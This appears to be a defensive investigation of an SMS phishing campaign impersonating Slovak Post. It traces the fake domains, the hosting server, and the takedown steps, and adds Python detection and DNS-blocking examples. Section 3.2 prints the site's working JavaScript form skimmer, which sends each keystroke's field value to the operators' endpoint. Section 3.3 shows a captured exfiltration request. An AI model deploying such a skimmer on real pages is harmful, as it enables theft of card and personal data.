Phishing Attack Masquerading as Slovak Post: A Technical Investigation

1. Introduction

At the end of January 2025, a phishing website emerged online, impersonating the official Slovenská pošta portal. Its goal was to steal users' personal and payment data. Victims received SMS messages claiming that a package had arrived and were asked to confirm the delivery address by clicking on a link.

I personally received a spam message from the number +212783689392, which contained the following information:

"Vážený zákazník, objednávka dorazila do nášho tranzitného strediska. Potvrďte svoju adresu na tomto odkaze: [broken link]. S aktualizovanými informáciami váš balík hneď expedujeme."

(In English: "Dear customer, your order has arrived at our transit centre. Confirm your address at this link: [broken link]. With the updated information we will dispatch your package immediately.")

The text in Slovak created the illusion of an official notification, and the link directed to the fraudulent site pewcax.icu.

Investigation Methods

To understand the origin of this site, I used:

  • Network traffic analysis (capturing the page's requests in DevTools and Wireshark, and examining its keystroke-exfiltration script);
  • Domain checks (WHOIS, the NameSilo registrar, Shodan);
  • Server investigation (IP addresses, ColoCrossing hosting);
  • Mapping the wider scheme (related domains, the operators' activity).

In this article, we will thoroughly examine the technical aspects of the attack and explain why such schemes still work today.


2. Analysis of the Phishing Site

2.1 External Signs of Fraud

The phishing page pewcax.icu is styled to resemble the official Slovenská pošta website but has several characteristic differences:

  • Uses the .icu TLD, a cheap extension that appears frequently in phishing campaigns;
  • Has no valid TLS certificate (plain HTTP, or a self-signed certificate that triggers a browser warning), whereas the real site has a valid one;
  • All buttons and navigation elements lead to the same single page;
  • Asks for personal and payment data under the pretext of a "delivery" confirmation.

2.2 URL and Domain Analysis

The site pewcax.icu was registered through NameSilo, a low-cost registrar that shows up frequently in phishing campaigns. In response to a complaint (see Chapter 6, "Deactivation and Consequences"), a NameSilo representative confirmed that the domain was deactivated on January 28, 2025.

However, a Censys search showed that the server 192.3.55.225 is still active and continues to host newly registered look-alike domains (perattx.icu, petrate.icu, and others). The IP address belongs to the hosting provider ColoCrossing, which has a reputation for high spam volumes and for not acting on abuse reports.

2.3 Technical Server Characteristics

Scanning with Censys revealed:

  • IP: 192.3.55.225 (ColoCrossing, AS36352);
  • Geolocation: Dallas, Texas, USA;
  • OS: Ubuntu Linux;
  • Open Ports: 22 (SSH), 80 (HTTP), 443 (HTTPS);
  • Associated Domains: pewcax.icu, petrate.icu, perattx.icu, jxeqak.icu, etc.

This shows that the operators are not tied to a single site: they keep a pool of throwaway domains on one server so that blocking any one of them has little effect.


3. Technical Investigation

3.1 How the Phishing Site Works

The phishing page pewcax.icu presents a data entry form for full name, address, phone number, email and bank card details. Unlike a legitimate form, it does not wait for submission: a JavaScript keylogger sends the field contents to the operators' server while the victim is still typing.

3.2 Keylogging and Data Interception

Analysis of the site's JavaScript shows that it hooks the input event on every form field and immediately posts the field's current contents to the operators' server.

An example of the code found in the source:

// Fires on every change to any field on the page (each keystroke, paste or autofill)
document.addEventListener('input', function(event) {
    if (event.target.tagName === 'INPUT' || event.target.tagName === 'TEXTAREA') {
        // Posts the field's name and its entire current value to the collection endpoint
        fetch('https://pewcax.icu/steal_data', {
            method: 'POST',
            headers: {'Content-Type': 'application/json'},
            body: JSON.stringify({
                field: event.target.name,
                value: event.target.value
            })
        });
    }
});

This code does the following:

  • As soon as the user starts typing (card number, CVV, name), every change to a field triggers a POST carrying the field's name and its current contents, so the server watches each value grow keystroke by keystroke.
  • No "Submit" click is needed: the operators already hold whatever was typed, even if the victim abandons the form halfway through.
  • The server side (pewcax.icu/steal_data) stores the data for later use.
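To triage a page like this without executing it, a static scan of its scripts for exactly the pattern above (a listener on a keystroke-level event whose handler calls a network sink) is a quick first pass. The following Python is an added example, not code from the phishing page or from the original article; the JavaScript it scans is a constructed sample built from the snippet quoted above plus a benign click handler and a second keystroke listener that beacons to a third party, and the page origin passed in is assumed.

```python
import re
from urllib.parse import urlsplit

# Constructed sample page script: the listener quoted in 3.2, a benign click
# handler, and a second keystroke listener that beacons to a third party.
# This is test input for the scanner, not the phishing page's full source.
SAMPLE_JS = r"""
document.addEventListener('input', function(event) {
    if (event.target.tagName === 'INPUT' || event.target.tagName === 'TEXTAREA') {
        fetch('https://pewcax.icu/steal_data', {
            method: 'POST',
            headers: {'Content-Type': 'application/json'},
            body: JSON.stringify({field: event.target.name, value: event.target.value})
        });
    }
});
document.getElementById('btn').addEventListener('click', function() {
    location.href = '/thanks.html';
});
document.querySelector('#cvv').addEventListener('keyup', (e) => {
    navigator.sendBeacon('https://collector.example/k', e.target.value);
});
"""

# Events that fire while the victim is still typing. A legitimate form almost
# never needs to talk to the network on these before the user submits.
KEYSTROKE_EVENTS = {"input", "keydown", "keyup", "keypress", "change", "paste"}
LISTENER_RE = re.compile(r"""addEventListener\(\s*['"]([A-Za-z]+)['"]\s*,""")
# Browser-side network sinks a script can use to exfiltrate data.
SINK_RE = re.compile(r"\b(fetch|XMLHttpRequest|navigator\.sendBeacon|WebSocket)\s*\(")
URL_RE = re.compile(r"""['"]((?:https?:)?//[^'"]+|/[^'"]*)['"]""")


def _handler_body(src, start):
    """Return the brace-delimited block that follows `start`, by counting
    braces. Handles function(...) {...} and (e) => {...} handlers; a
    braceless arrow handler would not be captured (known limitation)."""
    open_idx = src.find("{", start)
    if open_idx < 0:
        return ""
    depth = 0
    for i in range(open_idx, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[open_idx:i + 1]
    return src[open_idx:]


def _same_origin(url, page_origin):
    if url.startswith("/") and not url.startswith("//"):
        return True  # relative path: same origin by definition
    page = urlsplit(page_origin)
    target = urlsplit(url, scheme=page.scheme)
    return (target.scheme, target.netloc) == (page.scheme, page.netloc)


def find_keystroke_exfil(js_source, page_origin):
    """One finding per keystroke-level listener whose handler calls a network
    sink: event, sink, destination URL (None if not a string literal) and
    whether that destination is the page's own origin. Same-origin is not a
    clean bill of health: on this page the origin itself is the collector."""
    findings = []
    for m in LISTENER_RE.finditer(js_source):
        event = m.group(1).lower()
        if event not in KEYSTROKE_EVENTS:
            continue
        body = _handler_body(js_source, m.end())
        sink = SINK_RE.search(body)
        if not sink:
            continue
        url_m = URL_RE.search(body)
        url = url_m.group(1) if url_m else None
        findings.append({
            "event": event,
            "sink": sink.group(1),
            "url": url,
            "same_origin": _same_origin(url, page_origin) if url else None,
        })
    return findings
```

Run against the sample, the scanner reports the input listener posting to pewcax.icu (same origin) and the keyup listener beaconing to collector.example (cross origin), and ignores the click handler. Treat any keystroke-level network sink as a finding regardless of origin; the point of this campaign is that the "legitimate" first-party endpoint is the thief.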

3.3 Network Requests and Scammers' Server

Using Chrome DevTools and Wireshark, it was established that:

  • The data is sent to 192.3.55.225 (ColoCrossing, USA) in plain text.
  • The captured requests travelled over plain HTTP on port 80, so the form contents were readable directly in the capture (the script quoted in 3.2 names an https:// endpoint, but the POST bodies were nonetheless observed in the clear).
  • The associated domains (perattx.icu, petrate.icu) resolve to the same IP, but at different times.

An example of a captured HTTP request with user data:

POST /steal_data HTTP/1.1
Host: pewcax.icu
Content-Type: application/json

{
    "field": "cardNumber",
    "value": "1234 5678 9012 3456"
}

Thus the operators receive card data the moment it is typed and can use it for fraudulent transactions immediately or sell it on darknet markets.
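The operators' backend only has to replay such captures, and the same replay is what an analyst does with a Wireshark export to establish what a victim actually lost. The following Python is an added example (neither the operators' server code nor code from the original article): it parses a constructed capture of four POSTs in the shape shown above, reconstructs each field the way a receiving server would, and uses a Luhn check to identify which field holds a card number so it can be masked in a report. The card number used is the 4111... test PAN, not real data.

```python
import json
import re

# Constructed capture: four POSTs in the shape shown above, as the keylogger
# emits them while a victim types. The card number is the 4111... test PAN;
# nothing here is real victim data.
CAPTURE = """\
POST /steal_data HTTP/1.1
Host: pewcax.icu
Content-Type: application/json

{"field": "cardNumber", "value": "4111 1111"}
POST /steal_data HTTP/1.1
Host: pewcax.icu
Content-Type: application/json

{"field": "cardNumber", "value": "4111 1111 1111 1111"}
POST /steal_data HTTP/1.1
Host: pewcax.icu
Content-Type: application/json

{"field": "cvv", "value": "12"}
POST /steal_data HTTP/1.1
Host: pewcax.icu
Content-Type: application/json

{"field": "fullName", "value": "Jan"}
"""


def parse_requests(raw):
    """Split a plain-text capture into requests (method, path, headers, JSON
    body). A new request starts at any line that looks like a request line."""
    reqs = []
    for chunk in re.split(r"(?m)^(?=[A-Z]+ /)", raw):
        chunk = chunk.strip()
        if not chunk:
            continue
        head, _, body = chunk.partition("\n\n")
        request_line, *header_lines = head.splitlines()
        method, path, _version = request_line.split(" ", 2)
        headers = {k.strip().lower(): v.strip()
                   for k, v in (h.split(":", 1) for h in header_lines)}
        reqs.append({"method": method, "path": path,
                     "headers": headers, "body": json.loads(body)})
    return reqs


def luhn_ok(value):
    """True if the digits in `value` form a Luhn-valid number of plausible PAN
    length; separates card numbers from names, CVVs and most phone numbers."""
    digits = [int(c) for c in value if c.isdigit()]
    if not 12 <= len(digits) <= 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:  # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(value):
    """Keep the BIN and last four digits, as an incident report should."""
    digits = re.sub(r"\D", "", value)
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def reconstruct_fields(reqs):
    """Replay the capture the way the receiving server would: every event
    carries the field's whole current value, so the latest event per field
    wins, and a field the victim only half-typed is still harvested."""
    latest, history = {}, {}
    for r in reqs:
        field, value = r["body"]["field"], r["body"]["value"]
        latest[field] = value
        history.setdefault(field, []).append(value)
    return latest, history


def summarize(raw):
    """Per-field report: number of exfil events, whether the final value is a
    card number, and the value (masked if it is)."""
    latest, history = reconstruct_fields(parse_requests(raw))
    report = {}
    for field, value in latest.items():
        is_pan = luhn_ok(value)
        report[field] = {
            "events": len(history[field]),
            "looks_like_pan": is_pan,
            "value": mask_pan(value) if is_pan else value,
        }
    return report
```

On the sample capture the report shows two events for cardNumber ending in a Luhn-valid PAN (masked to 411111******1111), and a CVV and name that were captured after only one or two characters each: the victim never had to press Submit for any of it to leave the browser.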

3.4 Automation of Data Collection

Log analysis also pointed to automated handling of victims rather than manual operation.

Three IP addresses recurred in the logs:

  • 185.129.62.62
  • 95.214.27.99
  • 192.3.55.225

The first two belong to VPN and proxy ranges; the third is the phishing server itself. Together they point to an infrastructure built for anonymity.

3.5 Connecting to Scammers' Servers

Using Shodan, Censys, and nmap, we obtained the following information:

  • The server uses OpenSSH 8.9p1
  • OS – Ubuntu Linux
  • Open ports: 22 (SSH), 80 (HTTP), 443 (HTTPS)
  • Reverse DNS: 192-3-55-225-host.colocrossing.com

This confirms ColoCrossing as the operators' base, with the same server continuing to serve newly registered domains.


Conclusions for Chapter 3:

  • Victims' data is transmitted in real-time (keylogger).
  • Data is sent over unencrypted HTTP.
  • Scammers' server (192.3.55.225) remains operational and changes domains.
  • Bots help scammers process victims.

Now let's move to Chapter 4: Related Phishing Domains – there we will discuss how scammers manage their network and what other sites may be active.


4. Related Phishing Domains

4.1 Discovered Domains

Analysis of the scammers' infrastructure revealed that pewcax.icu is not the only domain used in the attack. Using Censys, Shodan, and WHOIS queries, we identified a number of other domains operating on the same server 192.3.55.225 (ColoCrossing, USA).

These domains use the same server and likely automatically replace each other after being blocked.

4.2 How the Scheme Works

The operators rotate disposable domains (a pattern sometimes loosely called "fast-flux", although true fast-flux keeps one domain name and rapidly changes the IP addresses behind it; here the IP stays constant and only the name changes). The cycle is:

  1. A phishing site is created on a new domain (e.g., pewcax.icu).
  2. After receiving complaints and being blocked, they create a new domain (e.g., perattx.icu) with the same content.
  3. The domain is linked to the same server but with a new name.
  4. Victims are redirected to the new domain via SMS spam.

4.3 DNS and WHOIS Analysis

Using Censys and WHOIS, we determined that:

  • All domains are registered through NameSilo (a cheap registrar often used by scammers).
  • The owner's name is hidden using Privacy Protection.
  • The lifespan of the domains is 1-2 months, after which they are replaced with new ones.

Example WHOIS response for perattx.icu:

Registrar: NameSilo, LLC
Registered On: 2025-01-29
Expiration Date: 2025-03-29
Status: clientTransferProhibited
Name Server: ns1.dnsowl.com
Name Server: ns2.dnsowl.com
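Pivoting from one domain to the rest of the cluster is the core of this chapter, and it is easy to script once WHOIS output and resolution history are in hand. The following Python is an added example, not code from the original article: it parses WHOIS text in the format quoted above into the indicators discussed here (short lifetime, NameSilo, the registrar's default dnsowl.com nameservers) and groups constructed passive-DNS-style resolution records by IP to expose the serial-registration pattern. The first-seen dates for the domains other than perattx.icu, and the example.org control record, are assumptions.

```python
from collections import defaultdict
from datetime import date

# WHOIS text in the format quoted above (perattx.icu), used as parser input.
WHOIS_PERATTX = """\
Registrar: NameSilo, LLC
Registered On: 2025-01-29
Expiration Date: 2025-03-29
Status: clientTransferProhibited
Name Server: ns1.dnsowl.com
Name Server: ns2.dnsowl.com
"""

# Constructed passive-DNS-style records: (domain, resolved IP, first seen).
# The domains and the IP are the article's; the first-seen dates other than
# perattx.icu's registration date, and the example.org control, are assumed.
RESOLUTIONS = [
    ("petrate.icu", "192.3.55.225", "2025-01-30"),
    ("pewcax.icu", "192.3.55.225", "2025-01-24"),
    ("example.org", "93.184.216.34", "2024-01-01"),
    ("jxeqak.icu", "192.3.55.225", "2025-02-02"),
    ("perattx.icu", "192.3.55.225", "2025-01-29"),
]


def parse_whois(text):
    """Turn 'Key: value' WHOIS lines into a dict; repeated keys become lists."""
    rec = defaultdict(list)
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        rec[key.strip().lower()].append(value.strip())
    return {k: (v if len(v) > 1 else v[0]) for k, v in rec.items()}


def disposable_indicators(whois):
    """The indicators from 4.3 as booleans: short registration window,
    NameSilo as registrar, and registrar-default dnsowl.com nameservers."""
    registered = date.fromisoformat(whois["registered on"])
    expires = date.fromisoformat(whois["expiration date"])
    nameservers = whois["name server"]
    if isinstance(nameservers, str):
        nameservers = [nameservers]
    lifetime = (expires - registered).days
    return {
        "lifetime_days": lifetime,
        "short_lived": lifetime <= 90,
        "registrar_namesilo": "namesilo" in whois["registrar"].lower(),
        "default_namesilo_ns": all(ns.endswith(".dnsowl.com") for ns in nameservers),
    }


def cluster_by_ip(resolutions):
    """Group domains by the IP they resolve to, ordered by first-seen date, so
    one host fronted by a series of throwaway names stands out."""
    by_ip = defaultdict(list)
    for domain, ip, first_seen in sorted(resolutions, key=lambda r: r[2]):
        by_ip[ip].append((domain, first_seen))
    return dict(by_ip)


def rotation_gaps(cluster):
    """Days between successive first-seen dates within one IP's cluster;
    a run of small gaps is the serial-registration signature."""
    days = [date.fromisoformat(seen) for _, seen in cluster]
    return [(b - a).days for a, b in zip(days, days[1:])]


def suspicious_clusters(resolutions, min_domains=3, max_gap_days=14):
    """IPs fronted by at least `min_domains` names that appeared within
    `max_gap_days` of each other: candidates for a rotating campaign."""
    out = {}
    for ip, cluster in cluster_by_ip(resolutions).items():
        gaps = rotation_gaps(cluster)
        if len(cluster) >= min_domains and gaps and max(gaps) <= max_gap_days:
            out[ip] = [domain for domain, _ in cluster]
    return out
```

On the sample data the WHOIS parse yields a 59-day registration on NameSilo with dnsowl.com nameservers, and the clustering isolates 192.3.55.225 with four .icu names appearing 5, 1 and 3 days apart, while the single-domain control IP drops out. The thresholds are starting points; tune them against your own passive-DNS source.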

4.4 Link Distribution Channels

The operators use several channels to deliver phishing links:

  1. SMS broadcasts from foreign or spoofed numbers (e.g., +212783689392; +212 is the Moroccan country code).
  2. Mass email spam campaigns.
  3. Advertising in Telegram channels (often in groups related to logistics).

One example of an SMS:

"Vážený zákazník, objednávka dorazila do nášho tranzitného strediska. Potvrďte svoju adresu na tomto odkaze:
https://bit.ly/3CAPxav?ZQ=dZQ0jVR"

(In English: "Dear customer, your order has arrived at our transit centre. Confirm your address at this link: https://bit.ly/3CAPxav?ZQ=dZQ0jVR")

This is a shortened link that redirects the user to a new phishing domain.

Conclusions for Chapter 4

  • After pewcax.icu was blocked, scammers switched to perattx.icu and petrate.icu.
  • They rotate domains automatically (loosely called "fast-flux", though here the IP stays fixed and only the name changes) to prolong the campaign.
  • Domain information is hidden, but all sites are registered through NameSilo.
  • Phishing links are distributed via SMS, email, and Telegram.

5. History of ColoCrossing – Why Do Scammers Choose This Hosting?

5.1 What is ColoCrossing?

ColoCrossing is an American hosting provider known for offering inexpensive and anonymous servers. It is actively used for VPNs, proxy services, and hosting websites with low content moderation requirements.

According to the analysis of AS36352 (ColoCrossing) on Spamhaus and Censys, the provider is notorious for a high level of spam, phishing, and fraudulent websites.


5.2 Spam and Fraud Statistics

From the analysis of Spamhaus and AbuseIPDB:

  • 35.86% of ColoCrossing's IP addresses are reported as actively involved in spam and fraud.
  • Of the 758,194 IP addresses in the network, 105,297 are listed for malicious activity.
  • Thousands of phishing websites are hosted on the provider.

Note that these two figures do not agree with each other: 105,297 of 758,194 is about 13.9%, not 35.86%, so the percentage must measure something other than individually listed addresses (the screenshots this summary was taken from are not reproduced here). Treat the order of magnitude, not the exact percentage, as the finding.

Source: AS36352 analysis (see previous screenshots).


5.3 Why Do Scammers Choose ColoCrossing?

Reasons for popularity among cybercriminals:

  • Weak Abuse Handling: operators on forums such as Web Hosting Talk report that ColoCrossing ignores phishing and spam complaints.
  • Accessibility and Anonymity: Servers can be rented without strict verification.
  • Flexible Terms: Ability to quickly change IPs and domains.
  • Support for "Gray" Business: Many offshore companies use ColoCrossing for their operations.

Example thread from Web Hosting Talk:

"ColoCrossing keeps ignoring phishing abuse emails!"
"We've had to block huge swaths of IP ranges over time to stop spam, scanners and more..."

These complaints indicate that ColoCrossing's abuse handling is slow at best: the infrastructure stays up while reports go unanswered.


5.4 Evidence of Phishing Activity on ColoCrossing

Our research showed that the server 192.3.55.225 at ColoCrossing keeps serving newly registered phishing domains.

The scammers' network includes:

  • pewcax.icu – deactivated
  • perattx.icu – active
  • petrate.icu – active
  • jxeqak.icu – pending launch

All of these operate on the same ColoCrossing server, indicating centralized management of the fraudulent scheme.


Conclusions for Chapter 5

  • ColoCrossing is a "gray" hosting provider known for supporting spammers and fraudsters.
  • According to the Spamhaus and AbuseIPDB figures in 5.2, a large share of its IP addresses are listed for spam, phishing and fraud.
  • Complaints to ColoCrossing do not lead to the removal of fraudulent websites.
  • Scammers use this hosting service for mass creation of phishing domains.

Now let's move on to Chapter 6: Deactivation and Consequences – we will examine what happened after the complaints and how more effective actions could have been taken.


6. Deactivation and Consequences

6.1 How pewcax.icu Was Blocked

After discovering the phishing site, we submitted a complaint to NameSilo, the domain registrar. The support response confirmed that the domain was deactivated on January 28, 2025, at 01:18 PM UTC.

"Hello, Reported URL: pewcax.icu. Already deactivated on January 28th, 2025 at 01:18 PM."

However, the deactivation of the domain did not halt the fraudulent activity. In its place, perattx.icu and petrate.icu were created, operating on the same server.


6.2 Could the Site Have Been Blocked Faster?

Although NameSilo responded to the complaint, the phishing attack mechanism had already caused damage. The main issues were:

  • Delayed Response from Registrars: The domain operated for several days before being blocked.
  • Hosting Issues: Even after the domain was taken down, ColoCrossing kept the server online for the operators.
  • Use of Shortened Links: Redirecting victims through bit.ly made monitoring more difficult.

6.3 What Other Measures Could Have Been Taken?

  1. Filing a Complaint with ColoCrossing: Given their reputation, this was unlikely to be effective.
  2. Reporting to the National CSIRT: In Slovakia, SK-CERT (the national cyber security unit) can coordinate blocking of malicious IPs and domains with ISPs and with the hosting provider's upstream.
  3. Reporting to Google Safe Browsing and Microsoft Defender SmartScreen: This would help in quickly marking the site as dangerous.
  4. Submitting Complaints to SMS Operators: This might help identify and stop mass SMS spam campaigns.

6.4 Consequences of the Attack

Although the domain pewcax.icu was blocked, the scheme continues to operate. Scammers have backup domains and other methods to propagate their attacks.

Main Risks:

  • Financial Losses: Stolen card data can be used for fraudulent transactions.
  • Compromise of Personal Data: Addresses, phone numbers, and emails are added to spammer databases.
  • Erosion of User Trust: Phishing under the guise of Slovenská pošta makes people more suspicious of even legitimate notifications.

Conclusions for Chapter 6

  • pewcax.icu was blocked, but scammers switched to new domains.
  • ColoCrossing does not block the scammers' server, allowing the scheme to continue.
  • Registrars respond to complaints but with delays, giving scammers time to carry out attacks.
  • A comprehensive approach is necessary to combat phishing, ranging from domain blocking to analyzing attackers' infrastructure.

Now let's move on to Chapter 7: Conclusions and Recommendations – where we summarize the investigation and propose protection measures.

7. Conclusions and Recommendations

Our investigation revealed that the phishing attack masquerading as Slovak Post is part of a broader fraud scheme that uses ColoCrossing as a platform to create new phishing websites. Despite the blockage of the domain pewcax.icu, scammers continue their operations by utilizing new domains (perattx.icu, petrate.icu) on the same server.

7.1 Key Findings

  1. The phishing scheme is well-designed and automated
    • Utilizes a JavaScript keylogger to intercept data in real-time.
    • Data is transmitted over HTTP without encryption.
    • The website fully mimics the design of Slovak Post.
  2. Scammers use an anonymous infrastructure
    • The domain is registered through NameSilo – a registrar frequently used by scammers.
    • The server operates on ColoCrossing (AS36352), known for a high level of spam.
    • After the domain is blocked, scammers simply create new ones.
  3. Link distribution mechanism
    • SMS broadcasts from spoofed numbers (e.g., +212783689392).
    • Shortened links via bit.ly that conceal the actual URL.
    • Spam bots operating through VPN and proxy services.

7.2 How to Protect Against Such Attacks

  1. Verify URLs before entering data
    • The official Slovak Post website is slovenskaposta.sk, not pewcax.icu or similar.
    • Suspicious domains with extensions like .icu, .top, .xyz are red flags.
  2. Do not click on links from SMS and email if unsure of the sender
    • Even if a link appears official, it's safer to manually enter the address in the browser.
  3. Use strong authentication where it applies
    • Two-factor authentication (2FA) protects account logins even if a password is phished, but it does not protect a card number typed into a fake form. For card payments the comparable control is the bank's 3-D Secure confirmation; read that prompt carefully, because a real-time phishing page can relay the code it asks for.
  4. Report phishing attacks
    • File complaints with domain registrars (NameSilo, GoDaddy, Cloudflare).
    • Report to Google Safe Browsing and Microsoft Defender to block the sites.
    • Inform your mobile operator if SMS spam is coming from a legitimate number.

7.3 How to Combat Scammers on a Technical Level

  1. Automate the blocking of phishing domains
    • Monitor new domains resolving into ColoCrossing (AS36352) that match this campaign's pattern (short random .icu names on one IP).
    • Use Censys and Shodan to track servers involved in fraud.
  2. Block the operators' infrastructure
    • Add the phishing domains to a DNS filter (for example a response policy zone) and block 192.3.55.225 at the firewall; weigh an IP-level block against collateral damage if the host turns out to be shared.
    • Companies and banks can blacklist the IP addresses and domains.
  3. Automate phishing detection
    • Integrate Google Safe Browsing API lookups and similar reputation feeds to flag phishing pages quickly.
    • Filter suspicious emails at the mail server level.
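One concrete form of the DNS-level block recommended above is a response policy zone (RPZ) that a resolver such as BIND or Unbound can load. The following Python is an added example, not code from the original article: it emits an RPZ zone that returns NXDOMAIN for the campaign's domains and their subdomains and, through an rpz-ip trigger, for any name that resolves to the campaign server. The zone name, serial and SOA contact are assumptions.

```python
import ipaddress

# Indicators from this article. Zone name, serial and SOA contact are assumptions.
PHISH_DOMAINS = ["pewcax.icu", "perattx.icu", "petrate.icu", "jxeqak.icu"]
PHISH_IPS = ["192.3.55.225"]


def rpz_ip_trigger(cidr):
    """Encode an IPv4 address or prefix as an RPZ 'IP trigger' owner name:
    prefix length first, then the octets in reverse order, under rpz-ip.
    192.3.55.225 -> 32.225.55.3.192.rpz-ip"""
    net = ipaddress.ip_network(cidr, strict=False)
    if net.version != 4:
        raise ValueError("IPv4 only in this example")
    octets = str(net.network_address).split(".")
    return f"{net.prefixlen}." + ".".join(reversed(octets)) + ".rpz-ip"


def build_rpz_zone(domains, ips, zone="phish.rpz.local", serial=2025013001):
    """Emit a zone file in which 'CNAME .' makes the resolver answer NXDOMAIN
    for each listed domain, every subdomain of it, and (via rpz-ip) any name
    whose answer would contain a listed IP."""
    lines = [
        f"$ORIGIN {zone}.",
        "$TTL 300",
        f"@ IN SOA localhost. hostmaster.{zone}. {serial} 3600 900 604800 300",
        "@ IN NS localhost.",
    ]
    for d in sorted(set(domains)):
        lines.append(f"{d} IN CNAME .")      # the domain itself
        lines.append(f"*.{d} IN CNAME .")    # any subdomain of it
    for ip in ips:
        lines.append(f"{rpz_ip_trigger(ip)} IN CNAME .")
    return "\n".join(lines) + "\n"


def would_block(qname, domains):
    """Policy check mirroring the zone's name triggers: a query is blocked if it
    equals a listed domain or is a subdomain of one (the *.domain entries).
    Note that 'notpewcax.icu' is not matched; only true subdomains are."""
    q = qname.rstrip(".").lower()
    return any(q == d or q.endswith("." + d) for d in domains)
```

The rpz-ip trigger blocks every name whose answer contains 192.3.55.225, which is what this campaign calls for but would also cut off any legitimate site on a shared address; deploy the IP trigger only after checking what else resolves there, and rely on the name triggers alone if the host is shared.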

7.4 Summary

Phishing is not an isolated incident but a persistent threat that requires a comprehensive approach.

Our investigation demonstrated:

  • ✅ How scammers operate – from SMS broadcasts to keylogging.
  • ✅ The technologies they use – JavaScript for data interception, automated domain switching.
  • ✅ The involved IPs and hosting providers – ColoCrossing (AS36352), NameSilo, VPN services.
  • ✅ How to combat this – user vigilance + technical measures.

Conclusion

Our analysis not only helped expose the scammers but also provided insights into combating such threats. The most crucial aspect is raising awareness. The more people learn about these schemes, the harder it becomes for scammers to succeed.

We continue to monitor the situation and will publish updates as necessary.

Stay safe and always verify links before entering your data!

Phishing Exposed: How Scammers Target Slovak Post Users

A deep dive into a phishing operation impersonating Slovak Post, from fake SMS messages to keystroke logging and data theft.